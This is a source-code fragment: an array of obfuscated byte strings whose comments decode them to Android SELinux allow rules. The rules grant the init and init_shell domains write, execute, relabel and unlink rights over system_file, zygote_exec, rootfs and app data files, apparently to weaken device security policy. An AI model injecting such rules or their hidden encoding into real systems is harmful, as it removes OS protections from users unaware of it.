    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init:app_data_file:file:relabelto"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:init:shell_data_file:file:create"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:init:shell_data_file:file:unlink"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:init:shell_data_file:file:open"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:init:shell_data_file:file:read"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:init:shell_data_file:file:write"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init:shell_data_file:file:getattr"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init:shell_data_file:file:setattr"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:init:shell_data_file:file:execute"
    "\x63\x53\x00\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:init:shell_data_file:file:execute_no_trans"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init:shell_data_file:file:relabelfrom"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init:shell_data_file:file:relabelto"
    "\x63\x53\x2f\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:init:lnk_file:file:create"
    "\x63\x53\x2f\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:init:lnk_file:file:unlink"
    "\x63\x53\x2d\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:init:lnk_file:file:open"
    "\x63\x53\x2d\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:init:lnk_file:file:read"
    "\x63\x53\x2e\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:init:lnk_file:file:write"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init:lnk_file:file:getattr"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init:lnk_file:file:setattr"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:init:lnk_file:file:execute"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:init:lnk_file:file:execute_no_trans"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init:lnk_file:file:relabelfrom"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init:lnk_file:file:relabelto"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:init:zygote_exec:file:create"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:init:zygote_exec:file:unlink"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:init:zygote_exec:file:open"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:init:zygote_exec:file:read"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:init:zygote_exec:file:write"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init:zygote_exec:file:getattr"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init:zygote_exec:file:setattr"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:init:zygote_exec:file:execute"
    "\x63\x53\x1c\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:init:zygote_exec:file:execute_no_trans"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init:zygote_exec:file:relabelfrom"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init:zygote_exec:file:relabelto"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:init:toolbox_exec:file:create"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:init:toolbox_exec:file:unlink"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:init:toolbox_exec:file:open"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:init:toolbox_exec:file:read"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:init:toolbox_exec:file:write"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init:toolbox_exec:file:getattr"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init:toolbox_exec:file:setattr"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:init:toolbox_exec:file:execute"
    "\x63\x53\x1d\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:init:toolbox_exec:file:execute_no_trans"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init:toolbox_exec:file:relabelfrom"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init:toolbox_exec:file:relabelto"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:init_shell:fuse:file:create"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:init_shell:fuse:file:unlink"
    "\x63\x53\x2f\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:init_shell:fuse:file:open"
    "\x63\x53\x2f\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:init_shell:fuse:file:read"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:init_shell:fuse:file:write"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:fuse:file:getattr"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:fuse:file:setattr"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:init_shell:fuse:file:execute"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:init_shell:fuse:file:execute_no_trans"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init_shell:fuse:file:relabelfrom"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init_shell:fuse:file:relabelto"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:init_shell:rootfs:file:create"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:init_shell:rootfs:file:unlink"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:init_shell:rootfs:file:open"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:init_shell:rootfs:file:read"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:init_shell:rootfs:file:write"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:rootfs:file:getattr"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:rootfs:file:setattr"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:init_shell:rootfs:file:execute"
    "\x63\x53\x1d\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:init_shell:rootfs:file:execute_no_trans"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init_shell:rootfs:file:relabelfrom"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init_shell:rootfs:file:relabelto"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:init_shell:system_file:file:create"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:init_shell:system_file:file:unlink"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:init_shell:system_file:file:open"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:init_shell:system_file:file:read"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:init_shell:system_file:file:write"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:system_file:file:getattr"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:system_file:file:setattr"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:init_shell:system_file:file:execute"
    "\x63\x53\x02\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:init_shell:system_file:file:execute_no_trans"
    "\x63\x53\x1d\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init_shell:system_file:file:relabelfrom"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init_shell:system_file:file:relabelto"
    "\x63\x53\x01\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:init_shell:system_app_data_file:file:create"
    "\x63\x53\x01\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:init_shell:system_app_data_file:file:unlink"
    "\x63\x53\x1f\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:init_shell:system_app_data_file:file:open"
    "\x63\x53\x1f\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:init_shell:system_app_data_file:file:read"
    "\x63\x53\x00\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:init_shell:system_app_data_file:file:write"
    "\x63\x53\x02\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:system_app_data_file:file:getattr"
    "\x63\x53\x02\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:system_app_data_file:file:setattr"
    "\x63\x53\x02\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:init_shell:system_app_data_file:file:execute"
    "\x63\x53\x0b\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:init_shell:system_app_data_file:file:execute_no_trans"
    "\x63\x53\x06\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init_shell:system_app_data_file:file:relabelfrom"
    "\x63\x53\x04\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init_shell:system_app_data_file:file:relabelto"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:init_shell:app_data_file:file:create"
